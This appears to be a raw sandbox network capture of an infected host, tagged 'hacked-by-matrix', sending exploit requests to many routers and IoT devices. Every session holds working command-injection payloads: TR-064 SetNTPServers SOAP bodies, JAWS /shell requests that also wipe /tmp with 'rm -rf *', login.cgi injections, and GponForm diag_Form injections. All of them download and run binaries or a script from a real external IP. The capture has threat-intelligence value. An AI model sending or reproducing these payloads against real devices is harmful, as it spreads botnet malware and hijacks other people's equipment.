                                                        Mar 21, 2024 05:23:35.154264927 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:35.377793074 CET197INHTTP/1.1 404 Not Found
                                                        Date: Thu Mar 21 07:23:34 2024
                                                        Server: tr069 http server
                                                        Content-Length: 15
                                                        Connection: close
                                                        Content-Type: text/plain; charset=ISO-8859-1
                                                        Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                        Data Ascii: File not found
                                                        Mar 21, 2024 05:23:36.516299009 CET197INHTTP/1.1 404 Not Found
                                                        Date: Thu Mar 21 07:23:34 2024
                                                        Server: tr069 http server
                                                        Content-Length: 15
                                                        Connection: close
                                                        Content-Type: text/plain; charset=ISO-8859-1
                                                        Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                        Data Ascii: File not found


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1971192.168.2.1342048177.34.93.2067547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:35.169584036 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1972192.168.2.1345272152.170.146.67547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:35.228960037 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1973192.168.2.1341916221.150.92.1847547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:35.271111012 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1974192.168.2.1350580183.127.245.2237547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:35.282890081 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:36.780251980 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1975192.168.2.1343736175.241.76.1467547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:35.282924891 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:36.780260086 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1976192.168.2.134943223.7.125.7880
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:36.071021080 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:36.177189112 CET438INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 216
                                                        Expires: Thu, 21 Mar 2024 04:23:36 GMT
                                                        Date: Thu, 21 Mar 2024 04:23:36 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 50 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 37 26 23 34 36 3b 33 64 61 61 32 63 31 37 26 23 34 36 3b 31 37 31 30 39 39 35 30 31 36 26 23 34 36 3b 30 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1>Your browser sent a request that this server could not understand.<P>Reference&#32;&#35;7&#46;3daa2c17&#46;1710995016&#46;0</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1977192.168.2.1349284118.39.243.617547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:36.095777988 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1978192.168.2.1344652152.170.146.67547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:37.029808998 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:48.913706064 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1979192.168.2.1342130212.1.144.21580
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:37.780220985 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:38.295427084 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1980192.168.2.136089018.196.137.17180
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:37.785970926 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:37.966587067 CET284INHTTP/1.1 400 Bad Request
                                                        Server: awselb/2.0
                                                        Date: Thu, 21 Mar 2024 04:23:37 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 122
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1981192.168.2.1342960212.181.253.13780
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:37.797086954 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:37.977838993 CET307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Thu, 21 Mar 2024 04:23:37 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>
                                                        Mar 21, 2024 05:23:38.946460009 CET307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Thu, 21 Mar 2024 04:23:37 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1982192.168.2.134293842.57.216.176443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:37.857841969 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1983192.168.2.13358745.225.248.209443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:37.857892990 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1984192.168.2.1337242212.243.94.109443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:37.857908964 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1985192.168.2.1333006212.32.17.42443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:37.857917070 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1986192.168.2.133294442.53.215.30443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:37.857947111 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1987192.168.2.1336762118.91.138.7443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:37.857970953 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1988192.168.2.13333225.73.187.108443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:37.857976913 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1989192.168.2.1335092212.204.83.40443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:37.858030081 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
